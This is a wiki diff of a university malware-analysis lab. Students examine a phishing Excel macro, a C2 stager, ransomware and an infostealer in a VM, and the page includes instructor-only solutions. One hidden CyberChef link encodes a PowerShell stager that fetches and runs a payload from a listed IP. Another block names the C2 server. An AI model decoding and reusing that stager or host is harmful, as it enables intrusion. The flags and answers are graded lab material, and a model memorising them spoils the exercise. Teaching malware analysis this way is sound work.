Differences
This shows you the differences between two versions of the page.
|
isc:labs:06 [2024/11/03 11:53] florin.stancu |
isc:labs:06 [2024/11/11 14:43] (current) vlad_iulius.nastase |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ===== Lab 06 - Malware ===== | + | ====== Lab 06 - Malware ====== |
| - | TODO | + | <ifauth @isc> |
| + | <note warning> | ||
| + | **Ghid Command and Control** | ||
| + | |||
| + | [[https://docs.google.com/document/d/1sPfDPA6IvklVLTsZMk6FHv_vrWzu94E3qw-B3eWwSnw/edit?usp=sharing]] | ||
| + | |||
| + | [[https://outline.vladn.st/s/fcb3a6a5-da87-40a7-872a-39ad4a9aff43]] | ||
| + | |||
| + | </note> | ||
| + | </ifauth> | ||
| + | |||
| + | ===== Setup ===== | ||
| + | |||
| + | For this lab we will use the provided Windows VM. Please [[https://repository.grid.pub.ro/cs/isc/ISC%20Malware%20Lab%20VM.zip|download it from here]] in advance (~12GB archived; **you will need ~30-40GB of free storage on your computer**). | ||
| + | |||
| + | The VM is compatible with VMWare (Workstation and Player) >16. You can [[https://softwareupdate.vmware.com/cds/vmw-desktop/|download VMWare here]]. We recommend Workstation 17. | ||
| + | |||
| + | <note warning> | ||
| + | All exercises will be done inside the Windows VM. **DO NOT** copy the provided files outside of the VM. Even if it is "didactic malware", written by us, it can actually be damaging to your computer. | ||
| + | </note> | ||
| + | |||
| + | <note> | ||
| + | Every tool you need is already installed on the VM we provided. If it’s not on the taskbar, you can find it on your Desktop, in the folder named ''%%Tools%%''. | ||
| + | </note> | ||
| + | |||
| + | If needed, we will also use [[https://cloud.grid.pub.ro/|Openstack]] (limited capacity). Use the ''%%isc_prj%%'' project and start a VM with the following specifications: | ||
| + | * Source: ''%%ISC Malware Lab%%'' | ||
| + | * Flavor: ''%%m1.isc_malware_lab%%'' | ||
| + | You don't need to specify an SSH key, we will be using the browser console to interact with the virtual machine. | ||
| + | |||
| + | ===== 00. Infection vector ===== | ||
| + | |||
| + | You are Gigel, an accountant at some lifeless notary firm. One day you receive an email with an attached Excel from //¿̶̦̞̗́͗̕y̸̳̹̗̆̏̍ǫ̵̭̞́͗͘ṷ̵̝͋̽r̸̢̪̈́ ̵͈̪̥̀̈́̓ḃ̶͇̬͑o̷͙̰̊͜š̷̱͈̐s̴͔͙̿?̵̤̽͆̕// telling you it’s some important financial data that has to be submitted until the end of the day to the authorities. Have you missed something? But you’re a good accountant, how did this happen? It’s probably something the bossman doesn’t really understand and is panicked for no reason, so you decide to open the attachment. You are filled with an extreme boredom and just want to get this stuff done and go back to scrolling Reddit, so you ignore any and all pop-ups, allow everything (despite the constant nagging of those pesky IT guys). | ||
| + | |||
| + | **The attachment is on your Desktop. Go ahead, open it. What could go wrong?** | ||
| + | |||
| + | ===== 01. Office Macros ===== | ||
| + | |||
| + | <note important> | ||
| + | You are now infected. | ||
| + | </note> | ||
| + | |||
| + | One of the most common infection vectors is phishing and social engineering, which relies on the user simply opening a malicious binary. In our case, simply opening that Excel document got you infected. You might not see anything suspicious happening for now, so keep reading. | ||
| + | |||
| + | ==== Online sandboxes ==== | ||
| + | |||
| + | While the VM we provided has some included tools for analysis, you probably don’t know where to get started. We recommend trying one of the available online sandboxes available. | ||
| + | |||
| + | * [[https://www.virustotal.com/gui/home/upload|VirusTotal]] | ||
| + | * [[https://www.hybrid-analysis.com/|Hybrid Analysis]] | ||
| + | * [[https://app.any.run/|ANY.RUN]] | ||
| + | |||
| + | The sandboxes mentioned above will take the documents you upload, run them (just like you did), but they also run some static analysis and monitor a few other things: | ||
| + | |||
| + | * process execution, including any child processes | ||
| + | * network activity | ||
| + | * static analysis for suspicious signatures | ||
| + | * Encoding detection | ||
| + | * Binary packing detection | ||
| + | * YARA Rules (a format to specify signatures for malware) | ||
| + | |||
| + | Pick one sandbox and submit the Excel document. See what info you can gather from the results. | ||
| + | |||
| + | <spoiler Hint 1> | ||
| + | <note tip> | ||
| + | Look at the processes that are executed, does anything look suspicious? | ||
| + | </note> | ||
| + | </spoiler> | ||
| + | |||
| + | <spoiler Hint 2> | ||
| + | <note tip> | ||
| + | What about network connections? | ||
| + | </note> | ||
| + | </spoiler> | ||
| + | |||
| + | ==== Visual Basic macros ==== | ||
| + | |||
| + | From sandbox results, you can probably observe some references to a Powershell process being started by Excel. Powershell is a shell, just like ''%%bash%%'' and is (at least from Windows 10/11) the default system shell on Windows. So, why would Excel, a spreadsheet program, need to open a shell prompt and run commands? In usual operation, it doesn’t, but for more advanced use cases, Excel (and some other Office products) allow you to write “macros”, which are functions written in the Visual Basic programming language. | ||
| + | |||
| + | You can read more about this | ||
| + | |||
| + | * https://support.microsoft.com/en-us/office/automatically-run-a-macro-when-opening-a-workbook-1e55959b-e077-4c88-a696-c3017600db44 | ||
| + | * https://learn.microsoft.com/en-us/office/vba/library-reference/concepts/getting-started-with-vba-in-office | ||
| + | |||
| + | |||
| + | Since our macro got executed when we opened the document, we need a way to see it without running Excel. We can use the ''%%oletools%%'' Python package for this. | ||
| + | |||
| + | |||
| + | <note> | ||
| + | **FLAG 1 [30p]** | ||
| + | |||
| + | Read the documentation for ''%%oletools%%'', available on [[https://github.com/decalage2/oletools|Github]] and extract the macro. ''%%oletools%%'' is already installed in your virtual machine. | ||
| + | </note> | ||
| + | |||
| + | <spoiler Hint> | ||
| + | ''%%oletools%%'' is the package name. Check the documentation for the name of the tool that seems to do what you want. | ||
| + | </spoiler> | ||
| + | |||
| + | Observe the output you got from ''%%oletools%%''. It also provides some insight into what the macro is doing, including the reason it automatically executes when the Excel workbook is opened. | ||
| + | |||
| + | We recommend using CyberChef to decode the powershell payload that is executed. Some useful CyberChef functions you might want to use (not completely necessary to use all of them): ''%%Find/Replace%%'', ''%%Drop Bytes%%'', some decoding function (figure out the encoding, or let CyberChef help you), ''%%Decode text%%''. | ||
| + | |||
| + | <spoiler Hint> | ||
| + | Windows uses UTF-16 Little Endian text encoding by default. | ||
| + | </spoiler> | ||
| + | |||
| + | |||
| + | In the end you get a weird looking Powershell script. You don’t need to worry about understanding it, but if you want to read more, you can [[https://dominicbreuker.com/post/learning_sliver_c2_06_stagers/#powershell-stager|do it here]]. Some useful information you can get from this Powershell script: | ||
| + | |||
| + | * the flag for this exercise | ||
| + | * the address for the attacker’s infrastructure (which you also observed in the sandbox results) | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | <code> | ||
| + | olevba 'IMPORTANT FIANNCIAL DATA.xls' | ||
| + | </code> | ||
| + | |||
| + | [[https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5B%22_%26%20%5C%5Cr%5C%5Cn%5D'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=SkFCWEFHa0FiZ0F6QURJQUlBQTlBQ0FBUUFBaUFBMEFDZ0IxQUhNQWFRQnVBR2NBSUFCVEFIa0Fjd0IwQUdVQWJRQTdBQTBBQ2dCMUFITUFhUUJ1QUdjQUlBQlRBSGtBY3dCMEFHVUFiUUF1QUZJQWRRQnVBSFFBYVFCdEFHVUFMZ0JKQUc0QWRBQmxBSElBYndCd0FGTUFaUUJ5QUhZQWFRQmpBR1VBY3dBN0FBMEFDZ0J3QUhVQVlnQnNBR2tBWXdBZ0FHTUFiQUJoQUhNQWN3QWdBRmNBYVFCdUFETUFNZ0FnQUhzQURRQUtBRnNBUkFCc0FHd0FTUSIgXw0KICAgICYgIkJ0QUhBQWJ3QnlBSFFBS0FBaUFHc0FaUUJ5QUc0QVpRQnNBRE1BTWdBaUFDa0FYUUFOQUFvQWNBQjFBR0lBYkFCcEFHTUFJQUJ6QUhRQVlRQjBBR2tBWXdBZ0FHVUFlQUIwQUdVQWNnQnVBQ0FBU1FCdUFIUUFVQUIwQUhJQUlBQldBR2tBY2dCMEFIVUFZUUJzQUVFQWJBQnNBRzhBWXdBb0FFa0FiZ0IwQUZBQWRBQnlBQ0FBYkFCd0FFRUFaQUJrQUhJQVpRQnpBSE1BTEFBTkFBb0FJQUFnQUNBQUlBQjFBR2tBYmdCMEFDQUFaQUIzQUZNQWFRQjYiIF8NCiAgICAmICJBR1VBTEFBTkFBb0FJQUFnQUNBQUlBQjFBR2tBYmdCMEFDQUFaZ0JzQUVFQWJBQnNBRzhBWXdCaEFIUUFhUUJ2QUc0QVZBQjVBSEFBWlFBc0FBMEFDZ0FnQUNBQUlBQWdBSFVBYVFCdUFIUUFJQUJtQUd3QVVBQnlBRzhBZEFCbEFHTUFkQUFwQURzQURRQUtBRnNBUkFCc0FHd0FTUUJ0QUhBQWJ3QnlBSFFBS0FBaUFHc0FaUUJ5QUc0QVpRQnNBRE1BTWdBaUFDd0FJQUJEQUdnQVlRQnlBRk1BWlFCMEFEMEFRd0JvQUdFQWNnQlRBR1VBZEFBdUFFIiBfDQogICAgJiAiRUFiZ0J6QUdrQUtRQmRBQTBBQ2dCd0FIVUFZZ0JzQUdrQVl3QWdBSE1BZEFCaEFIUUFhUUJqQUNBQVpRQjRBSFFBWlFCeUFHNEFJQUJKQUc0QWRBQlFBSFFBY2dBZ0FFTUFjZ0JsQUdFQWRBQmxBRlFBYUFCeUFHVUFZUUJrQUNnQURRQUtBQ0FBSUFBZ0FDQUFTUUJ1QUhRQVVBQjBBSElBSUFCc0FIQUFWQUJvQUhJQVpRQmhBR1FBUVFCMEFIUUFjZ0JwQUdJQWRRQjBBR1VBY3dBc0FBMEFDZ0FnQUNBQUlBQWdBSFVBYVFCdUFIUUFJQUJrQUhjQSIgXw0KICAgICYgIlV3QjBBR0VBWXdCckFGTUFhUUI2QUdVQUxBQU5BQW9BSUFBZ0FDQUFJQUJKQUc0QWRBQlFBSFFBY2dBZ0FHd0FjQUJUQUhRQVlRQnlBSFFBUVFCa0FHUUFjZ0JsQUhNQWN3QXNBQTBBQ2dBZ0FDQUFJQUFnQUVrQWJnQjBBRkFBZEFCeUFDQUFiQUJ3QUZBQVlRQnlBR0VBYlFCbEFIUUFaUUJ5QUN3QURRQUtBQ0FBSUFBZ0FDQUFkUUJwQUc0QWRBQWdBR1FBZHdCREFISUFaUUJoQUhRQWFRQnZBRzRBUmdCc0FHRUFad0J6QUN3QURRQUtBQ0FBSUEiIF8NCiAgICAmICJBZ0FDQUFTUUJ1QUhRQVVBQjBBSElBSUFCc0FIQUFWQUJvQUhJQVpRQmhBR1FBU1FCa0FDa0FPd0FOQUFvQVd3QkVBR3dBYkFCSkFHMEFjQUJ2QUhJQWRBQW9BQ0lBYXdCbEFISUFiZ0JsQUd3QU13QXlBQzRBWkFCc0FHd0FJZ0FzQUNBQVV3QmxBSFFBVEFCaEFITUFkQUJGQUhJQWNnQnZBSElBUFFCMEFISUFkUUJsQUNrQVhRQU5BQW9BY0FCMUFHSUFiQUJwQUdNQUlBQnpBSFFBWVFCMEFHa0FZd0FnQUdVQWVBQjBBR1VBY2dCdUFDQUFWUUJKIiBfDQogICAgJiAiQUc0QWRBQXpBRElBSUFCWEFHRUFhUUIwQUVZQWJ3QnlBRk1BYVFCdUFHY0FiQUJsQUU4QVlnQnFBR1VBWXdCMEFDZ0FEUUFLQUNBQUlBQWdBQ0FBU1FCdUFIUUFVQUIwQUhJQUlBQm9BRWdBWVFCdUFHUUFiQUJsQUN3QURRQUtBQ0FBSUFBZ0FDQUFWUUJKQUc0QWRBQXpBRElBSUFCa0FIY0FUUUJwQUd3QWJBQnBBSE1BWlFCakFHOEFiZ0JrQUhNQUtRQTdBQTBBQ2dCOUFBMEFDZ0FpQUVBQURRQUtBRUVBWkFCa0FDMEFWQUI1QUhBQVpRQWdBQyIgXw0KICAgICYgIlFBVndCcEFHNEFNd0F5QUEwQUNnQU5BQW9BSXdBZ0FFa0FVd0JEQUhzQWFBQmxBR01BWVFCeUFHMEFaUUJ1QUY4QWR3QmhBSE1BWHdCb0FHVUFjZ0JsQUgwQURRQUtBRnNBVXdCNUFITUFkQUJsQUcwQUxnQk9BR1VBZEFBdUFGTUFaUUJ5QUhZQWFRQmpBR1VBVUFCdkFHa0FiZ0IwQUUwQVlRQnVBR0VBWndCbEFISUFYUUE2QURvQVV3QmxBSElBZGdCbEFISUFRd0JsQUhJQWRBQnBBR1lBYVFCakFHRUFkQUJsQUZZQVlRQnNBR2tBWkFCaEFIUUEiIF8NCiAgICAmICJhUUJ2QUc0QVF3QmhBR3dBYkFCaUFHRUFZd0JyQUNBQVBRQWdBSHNBSkFCMEFISUFkUUJsQUgwQUlBQTdBQTBBQ2dBa0FITUFhQUJsQUd3QWJBQmpBRzhBWkFCbEFDQUFQUUFnQUNnQVRnQmxBSGNBTFFCUEFHSUFhZ0JsQUdNQWRBQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVRnQmxBSFFBTGdCWEFHVUFZZ0JEQUV3QWFRQmxBRzRBZEFBcEFDNEFSQUJ2QUhjQWJnQnNBRzhBWVFCa0FFUUFZUUIwQUdFQUtBQWlBR2dBZEFCMEFIQUFjd0E2QUM4QUx3IiBfDQogICAgJiAiQXhBRGtBTkFBdUFERUFPQUF5QUM0QU1RQTJBRFFBTGdBeEFEUUFPUUE2QURnQU1BQTRBREFBTHdCbUFHOEFiZ0IwQUdFQWR3QmxBSE1BYndCdEFHVUFMZ0IzQUc4QVpnQm1BQ0lBS1FBTkFBb0FhUUJtQUNBQUtBQWtBSE1BYUFCbEFHd0FiQUJqQUc4QVpBQmxBQ0FBTFFCbEFIRUFJQUFrQUc0QWRRQnNBR3dBS1FBZ0FIc0FSUUI0QUdrQWRBQjlBRHNBRFFBS0FDUUFjd0JwQUhvQVpRQWdBRDBBSUFBa0FITUFhQUJsQUd3QWJBQmpBRzhBWkFCbCIgXw0KICAgICYgIkFDNEFUQUJsQUc0QVp3QjBBR2dBRFFBS0FBMEFDZ0JiQUVrQWJnQjBBRkFBZEFCeUFGMEFKQUJoQUdRQVpBQnlBQ0FBUFFBZ0FGc0FWd0JwQUc0QU13QXlBRjBBT2dBNkFGWUFhUUJ5QUhRQWRRQmhBR3dBUVFCc0FHd0Fid0JqQUNnQU1BQXNBQ1FBY3dCcEFIb0FaUUFzQURBQWVBQXhBREFBTUFBd0FDd0FNQUI0QURRQU1BQXBBRHNBRFFBS0FGc0FVd0I1QUhNQWRBQmxBRzBBTGdCU0FIVUFiZ0IwQUdrQWJRQmxBQzRBU1FCdUFIUUFaUUJ5QUciIF8NCiAgICAmICI4QWNBQlRBR1VBY2dCMkFHa0FZd0JsQUhNQUxnQk5BR0VBY2dCekFHZ0FZUUJzQUYwQU9nQTZBRU1BYndCd0FIa0FLQUFrQUhNQWFBQmxBR3dBYkFCakFHOEFaQUJsQUN3QUlBQXdBQ3dBSUFBa0FHRUFaQUJrQUhJQUxBQWdBQ1FBY3dCcEFIb0FaUUFwQUEwQUNnQWtBSFFBYUFCaEFHNEFaQUJzQUdVQVBRQmJBRmNBYVFCdUFETUFNZ0JkQURvQU9nQkRBSElBWlFCaEFIUUFaUUJVQUdnQWNnQmxBR0VBWkFBb0FEQUFMQUF3QUN3QUpBQmhBR1FBIiBfDQogICAgJiAiWkFCeUFDd0FNQUFzQURBQUxBQXdBQ2tBT3dBTkFBb0FXd0JYQUdrQWJnQXpBRElBWFFBNkFEb0FWd0JoQUdrQWRBQkdBRzhBY2dCVEFHa0FiZ0JuQUd3QVpRQlBBR0lBYWdCbEFHTUFkQUFvQUNRQWRBQm9BR0VBYmdCa0FHd0FaUUFzQUNBQVd3QjFBR2tBYmdCMEFETUFNZ0JkQUNJQU1BQjRBRVlBUmdCR0FFWUFSZ0JHQUVZQVJnQWlBQ2tBIg&ieol=CRLF&oeol=CRLF|CyberChef recipe]] | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| + | |||
| + | ===== 02. Command and Control (C2 / C&C) ===== | ||
| + | |||
| + | What you uncovered is a command and control stager. Command and control attacks are a type of attack where a program is used to gain control of the infected computers. This requires a connection to a command and control server, where attackers can see the infected devices and send command to them. Some functionality of command and control binaries: | ||
| + | |||
| + | * process control (spawning, killing and dumping processes) | ||
| + | * information gathering (user, network, computer) | ||
| + | * file transfer | ||
| + | * covert persistence (via process injection, beacons, backdoored binaries) | ||
| + | * screenshot taking | ||
| + | |||
| + | <note> | ||
| + | **FLAG 2 [10p]** | ||
| + | |||
| + | Attackers might neglect the security of their own infrastructure. Check if this is the case. Maybe try some other known ports? (''%%nmap%%'' is installed, but you probably don't need it) | ||
| + | </note> | ||
| + | |||
| + | |||
| + | The C2 stager we used is a pretty simple one. If you want to read more about C2 capabilities you can read this [[https://dominicbreuker.com/post/learning_sliver_c2_01_installation/|awesome blog post series]] about Sliver. | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | [[http://194.182.164.149/]] | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| + | |||
| + | ===== 03. Ransomware ===== | ||
| + | |||
| + | <note warning> | ||
| + | Ask your lab assistant to use the C2 server to send some actual malware your way. | ||
| + | |||
| + | As a backup, the ransomware binary can also be found in ''%%C:\Users\<your_user>\Documents\backup%%'' | ||
| + | </note> | ||
| + | |||
| + | **As before, go ahead and run it, see what happens.** | ||
| + | |||
| + | |||
| + | Ransomware is a type of malware that encrypts documents and files on your computer, demanding a ransom to obtain a decryption key or program. In our case, the entire content of the ''%%very_secret_documents%%'' folder on your Desktop has been encrypted. | ||
| + | |||
| + | But is there any way you can recover those files? Since we presume the attacker has a decryption key for your files, that means the ransomware must communicate in some way. Try and use Wireshark to see if any traffic seems out of the ordinary. | ||
| + | |||
| + | |||
| + | <note> | ||
| + | **FLAG 3 [20p]** | ||
| + | |||
| + | Try and find the decryption key. | ||
| + | </note> | ||
| + | |||
| + | <note> | ||
| + | **FLAG 4 [10p]** | ||
| + | |||
| + | Decrypt the files, maybe they contained a flag. You can use the provided ''%%decryptor.exe%%'' (on your Desktop), or you can challenge yourself and try to decrypt them manually (CyberChef can be of great help here; assume the encryption is a well-known one). | ||
| + | </note> | ||
| + | |||
| + | <note tip> | ||
| + | You can also use any of the sandboxes you used at the first exercise and see what useful information they can provide. | ||
| + | </note> | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | Cheia e trimisa ca DNS request (hex-encoded). | ||
| + | |||
| + | <code> | ||
| + | .\decryptor.exe $hex_key .\very_important_documents | ||
| + | </code> | ||
| + | |||
| + | Flag-ul din documente e sub trollface-ul din documentul ''%%subiecte examen ISC.docx%%'' | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| + | |||
| + | ===== 04. Infostealers ===== | ||
| + | |||
| + | As the name suggests, this type of malware steals information from your system. Usually, they steal browser data, since it can contain: | ||
| + | |||
| + | * stored passwords | ||
| + | * saved credit cards | ||
| + | * valid cookies (they can be used for [[https://owasp.org/www-community/attacks/Session_hijacking_attack|session hijacking]]) | ||
| + | |||
| + | **As before, run the provided ''%%infostealer.exe%%'' from your lab assistant (or the backup one)** | ||
| + | |||
| + | |||
| + | Seemingly nothing happens (except that your browser might close on you), but let us take a look at what files are accessed by ''%%infostealer.exe%%''. We can use the tool ''%%procmon64%%'' from the [[https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite|Sysinternals Suite]] to analyze some of the runtime behavior of a program, including accessed files and network activity. | ||
| + | |||
| + | <note> | ||
| + | **FLAG 5 [30p]** | ||
| + | |||
| + | Find what information has been stolen from you. There’s a flag in there. | ||
| + | </note> | ||
| + | |||
| + | |||
| + | Use ''%%procmon64%%'' to look for accessed files and network activity. By default ''%%procmon64%%'' shows what all current processes are doing. Try and filter for our process (look at what options ''%%procmon64%%'' offers you at the top of the window). | ||
| + | |||
| + | <note tip> | ||
| + | **You need to run the binary again after setting up your filters!** | ||
| + | </note> | ||
| + | |||
| + | Also try to have a look at the files that are managed by Chrome and check out the links at the end of the lab if you want to better understand how he passwords are stored. You also have a tool to explore SQLite databases installed already. | ||
| + | |||
| + | <spoiler Hint> | ||
| + | If there is some network activity that interests you, you can use Wireshark. It has some awesome features, like extracting objects from network requests (//wink wink//). | ||
| + | </spoiler> | ||
| + | |||
| + | |||
| + | <note tip> | ||
| + | Make use of the sandboxes, maybe they also provide some useful information. See how it compares to what you find by manually analyzing the binary. | ||
| + | </note> | ||
| + | |||
| + | <ifauth @isc> | ||
| + | <hidden> | ||
| + | Arhiva cu cookie-urile si parolele de la Chrome e trimisa ca POST request. (Wireshark > File > Export objects > HTTP) | ||
| + | </hidden> | ||
| + | </ifauth> | ||
| + | |||
| + | ===== 05. [Bonus] Anti-reversing techniques ===== | ||
| + | |||
| + | If you were brave enough to try and decompile the executables, you might have noticed they look like gibberish. If not, use Ghidra to have a look at one of the executables. | ||
| + | |||
| + | The executables are missing any symbols and the code seems very hard to understand. That is because they are packed using [[https://upx.github.io/|UPX]]. While UPX is an executable packer, meant to be used for executable compression, it is also commonly used to make reverse engineering harder. | ||
| + | |||
| + | The good news is that you can also unpack it using UPX. It is already installed in your VM, so give it a try. | ||
| + | |||
| + | After unpacking it, try to decompile it again using Ghidra. Does it look a little bit more readable? | ||
| + | |||
| + | It is still not as readable as if you were expecting if you ever looked at a C binary decompiled, and that is because our executables were written in Go. Another technique that makes reverse engineering harder is the use of modern languages (Go, Rust, Zig, Nim), as they each come with their own (complex) runtime. | ||
| + | |||
| + | ===== Further reading ===== | ||
| + | |||
| + | * https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html | ||
| + | * https://superuser.com/questions/718383/where-are-google-chrome-passwords-stored-in-windows | ||
| + | * https://superuser.com/questions/146742/how-does-google-chrome-store-passwords | ||
| + | * https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/ | ||
